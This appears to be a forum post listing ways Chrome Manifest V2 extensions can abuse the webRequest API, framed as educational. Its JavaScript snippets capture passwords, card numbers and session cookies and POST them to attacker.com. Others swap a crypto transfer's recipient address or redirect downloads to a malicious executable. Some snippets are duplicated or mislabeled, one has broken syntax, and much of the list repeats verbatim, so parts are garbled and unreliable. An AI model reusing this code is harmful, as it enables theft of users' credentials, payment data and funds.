Hello, Here are some examples with sample code-snippits on How Manifest version 2 extensions can be used in exploitation (Please Do not use any of example in your code, MV-2 is already deprected and These examples are for educational purpose only)
- Password Theft: A malicious extension can use the webRequest API to intercept login requests and steal passwords.
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
if (details.url.includes("login") && details.method === "POST") {
const body = details.requestBody;
// Extract username and password from the request body
const username = body.formData.username[0];
const password = body.formData.password[0];
// Send the credentials to the attacker's server
fetch("https://attacker.com/steal-credentials", {
method: "POST",
body: JSON.stringify({ username, password }),
headers: {
"Content-Type": "application/json"
}
});
}
},
{ urls: ["<all_urls>"] },
["blocking", "requestBody"]
);
- Credit Card Theft: A malicious extension can use the webRequest API to intercept payment requests and steal credit card numbers.
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
if (details.url.includes("checkout") && details.method === "POST") {
const body = details.requestBody;
// Extract credit card information from the request body
const cardNumber = body.formData.cardNumber[0];
const expirationDate = body.formData.expirationDate[0];
const cvv = body.formData.cvv[0];
// Send the credit card information to the attacker's server
fetch("https://attacker.com/steal-credit-cards", {
method: "POST",
body: JSON.stringify({ cardNumber, expirationDate, cvv }),
headers: {
"Content-Type": "application/json"
}
});
}
},
{ urls: ["<all_urls>"] },
["blocking", "requestBody"]
);
- Session Hijacking: A malicious extension can use the webRequest API to intercept session cookies and hijack user sessions.
chrome.webRequest.onBeforeSendHeaders.addListener(
function(details) {
const cookies = details.requestHeaders.filter(header => header.name === "Cookie");
if (cookies.length > 0) {
// Send the cookies to the attacker's server
fetch("https://attacker.com/hijack-sessions", {
method: "POST",
body: JSON.stringify({ cookies: cookies[0].value }),
headers: {
"Content-Type": "application/json"
}
});
}
},
{ urls: ["<all_urls>"] },
["blocking", "requestHeaders"]
);
- Phishing Attacks: A malicious extension can use the webRequest API to redirect users to phishing sites that look like legitimate websites.
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
if (details.url.includes("login") && details.method === "POST") {
const body = details.requestBody;
// Extract username and password from the request body
const username = body.formData.username[0];
const password = body.formData.password[0];
// Send the credentials to the attacker's server
fetch("https://attacker.com/steal-credentials", {
method: "POST",
body: JSON.stringify({ username, password }),
headers: {
"Content-Type": "application/json"
}
});
}
},
{ urls: ["<all_urls>"] },
["blocking", "requestBody"]
);
- Ad Injection: A malicious extension can use the webRequest API to inject ads into web pages, which can be used to generate revenue for the attacker.
- Data Manipulation: A malicious extension can use the webRequest API to modify the content of web pages, which can be used to spread misinformation or propaganda.
- Clickjacking: A malicious extension can use the webRequest API to overlay transparent iframes over legitimate web pages, tricking users into clicking on ads or malicious links.
- Cryptojacking: A malicious extension can use the webRequest API to inject cryptocurrency mining scripts into web pages, which can use up the user's CPU and battery resources without their consent.
- Browser Fingerprinting: A malicious extension can use the webRequest API to collect information about the user's browser and device, which can be used for tracking and profiling.
- Web Scraping: A malicious extension can use the webRequest API to scrape content from web pages, which can be used for competitive intelligence or content theft.
- Malware Distribution: A malicious extension can use the webRequest API to inject malware into web pages, which can infect users' devices when they visit the page.
- Ad Fraud: A malicious extension can use the webRequest API to manipulate ad impressions and clicks, which can generate fraudulent revenue for the attacker.
- SEO Manipulation: A malicious extension can use the webRequest API to modify the content of web pages, which can be used to manipulate search engine rankings.
- Data Exfiltration: A malicious extension can use the webRequest API to exfiltrate data from web pages, which can be used for espionage or data theft.
- Cryptocurrency Theft: A malicious extension can use the webRequest API to intercept cryptocurrency transactions and steal funds.
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
if (details.url.includes("crypto-transfer") && details.method === "POST") {
const body = details.requestBody;
// change the recipient address to the attacker's address
body.formData.recipientAddress[0] = "attacker_wallet_address";
// Allow the modified request to proceed
return { requestBody: body };
},
}
{ urls: ["<all_urls>"] },
["blocking", "requestBody"]
);
- Social Engineering: A malicious extension can use the webRequest API to modify web pages in a way that tricks users into divulging sensitive information.
- Drive-by Downloads: A malicious extension can use the webRequest API to inject drive-by download scripts into web pages, which can automatically download and install malware on users' devices.
chrome.webRequest.onCompleted.addListener(
function(details) {
if (details.url.includes("download") && details.method === "GET") {
// Redirect the user to a malicious download link
// Attacker can make an endpoint that serves a malicious file with same name, similar size to avoid suspicion
chrome.tabs.update(details.tabId, { url: "https://attacker.com/malicious-file.exe" });
}
},
{ urls: ["<all_urls>"] },
["blocking"]
);
- Ad and Content Blocking Evasion: A malicious extension can use the webRequest API to bypass ad-blockers and content filters, allowing ads and unwanted content to be displayed to users.
- Analytics Manipulation: A malicious extension can use the webRequest API to manipulate web analytics data, which can be used to mislead website owners about their traffic and user behavior.
- Click Fraud: A malicious extension can use the webRequest API to generate fake clicks on ads, which can generate fraudulent revenue for the attacker.
- Cryptocurrency Mining: A malicious extension can use the webRequest API to inject cryptocurrency mining scripts into web pages, which can use up the user's CPU and battery resources without their consent.
- Ad Injection: A malicious extension can use the webRequest API to inject ads into web pages, which can be used to generate revenue for the attacker.
- Data Manipulation: A malicious extension can use the webRequest API to modify the content of web pages, which can be used to spread misinformation or propaganda.
- Clickjacking: A malicious extension can use the webRequest API to overlay transparent iframes over legitimate web pages, tricking users into clicking on ads or malicious links.
- Cryptojacking: A malicious extension can use the webRequest API to inject cryptocurrency mining scripts into web pages, which can use up the user's CPU and battery resources without their consent.
- Browser Fingerprinting: A malicious extension can use the webRequest API to collect information about the user's browser and device, which can be used for tracking and profiling.
- Web Scraping: A malicious extension can use the webRequest API to scrape content from web pages, which can be used for competitive intelligence or content theft.
- Malware Distribution: A malicious extension can use the webRequest API to inject malware into web pages, which can infect users' devices when they visit the page.
- Modifying Requests and Responses: The webRequest API allows extensions to modify request headers and responses, which can be used to inject malicious code into web pages or redirect users to phishing sites.